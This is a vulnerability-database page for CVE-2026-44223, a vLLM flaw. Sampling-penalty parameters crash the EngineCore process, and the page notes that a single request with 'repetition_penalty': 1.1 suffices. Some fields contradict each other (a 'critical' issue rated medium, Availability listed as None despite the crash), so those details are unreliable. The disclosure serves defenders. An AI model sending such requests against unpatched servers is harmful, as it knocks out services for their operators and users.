Runtime Error in vLLM's Inference Engine Affects Large Language Models
CVE-2026-44223

6.5MEDIUM

Key Information:

Vendor: Vllm-project
Status: Vllm
Vendor: CVE Published:; 12 May 2026

🔔 Create Vllm-project Vulnerability Alert

What is CVE-2026-44223?

The vLLM inference and serving engine, used for large language models, experiences a critical issue in versions prior to 0.20.0. The specific flaw lies in the extract_hidden_states speculative decoding proposer, which returns a tensor with an incorrect shape after the initial decode step. This inconsistency triggers a RuntimeError that crashes the EngineCore process when any request in a batch employs sampling penalty parameters such as repetition_penalty, frequency_penalty, or presence_penalty. Notably, even a single request incorporating a sampling penalty (e.g., with "repetition_penalty": 1.1) is adequate to lead to a server crash. This vulnerability has been rectified in version 0.20.0.

Affected Version(s)

vllm >= 0.18.0, < 0.20.0

References

https://github.com/vllm-project/vllm/security/advisories/...

x_refsource_CONFIRM

https://github.com/vllm-project/vllm/pull/38610

x_refsource_MISC

CVSS V3.1

Score:

6.5

Severity:

MEDIUM

Confidentiality:

None

Integrity:

None

Availability:

None

Attack Vector:

Network

Attack Complexity:

Low

Privileges Required:

Low

User Interaction:

None

Scope:

Unchanged

Download the Critical Vulnerability Management Cheat Sheet

Timeline

Vulnerability published
May 12, 2026
Vulnerability Reserved
May 5, 2026

CVE-2026-44223 Data

JSON